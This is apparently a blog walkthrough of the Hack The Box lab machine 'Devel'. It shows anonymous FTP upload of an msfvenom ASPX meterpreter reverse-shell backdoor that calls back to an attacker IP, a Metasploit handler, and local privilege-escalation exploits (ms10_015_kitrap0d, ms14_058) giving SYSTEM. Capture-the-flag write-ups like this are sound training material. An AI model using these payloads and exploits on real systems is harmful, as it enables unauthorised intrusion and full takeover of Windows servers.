Welcome to another walkthrough from the hack-the-box challenges. The machine is Devel.
IP: 10.10.10.5
OS: Windows.
Enumeration:
Nmap scan reveals ports 21 and 80 are open. Port 21 allows anonymous FTP login.
Exploitation:
The website runs a default IIS landing page on port 80 which is Microsoft webserver and is a dead end as nothing is on the html source code either.
Using BURP we see that the webpage is powered by ASP.NET. This information is what we need to create a backdoor using msfvenom specifically aspx.
Method 1.
We connect to ftp using the anonymous login credentials in the nmap scan. Username: anonymous, Password: anonymous. We can either do this via Filezilla tool which is available on kali or via the command line.
Using command line:
we login and run the dir command and see a few files then we create a file test.html (echo fresec > test.html) and try to upload it via put command. We chose to create test.html as there was also another html file "iisstart.htm" already on there which we could assume is the web root.
We see that the file has been uploaded and browsing to test.html, we see that it is executed..
Next we generate a aspx backdoor using msfvenom and also start multi handler in the Metasploit framework.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.20 LPORT=4444 -f aspx > fresec.aspx
Next we start our metasploit handler as shown below, upload the aspx backdoor and then browse to it and click on it and we get a shell :).
Privilege Escalation:
Next we run the post/multi/recon/local_exploit_suggester for priv esc.
Numerous exploits are suggested but I chose to use "exploit/windows/local/ms10_015_kitrap0d"
msf exploit(ms10_015_kitrap0d) >set lhost 10.10.14.20
msf exploit(ms10_015_kitrap0d) >set lport 4321
msf exploit(ms10_015_kitrap0d) >set session 2
msf exploit(ms10_015_kitrap0d) >exploit
We get a meterpreter session as NT AUTHORITY SYSTEM!!.
Meterpreter > getuid
Using Filezilla:
we login using the username anonymous and any password. Remote IP 10.10.10.5 and Port is 21.
We start our metasploit handler and then transfer our created aspx backdoor to the remote/ victim machine.
msf use exploit/multi/handler
msf exploit(multi/handler) set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) set lhost 10.10.14.20
msf exploit(multi/handler) set lport 4444
msf exploit(multi/handler) exploit
Then we upload the aspx backdoor, click on it to execute it via the browser http://10.10.10.5/fresec.aspx and get a meterpreter shell.
Next we run local exploit suggester to get privilege escalation exploits and I chose the "/windows/local/ms14_058_track_popup_menu" exploit. Run the below commands and got a NT AUTHORITY SYSTEM SHELL!!
>set lhost 10.10.14.20
>set lport 4321
>set session 1
>exploit
Comments
Post a Comment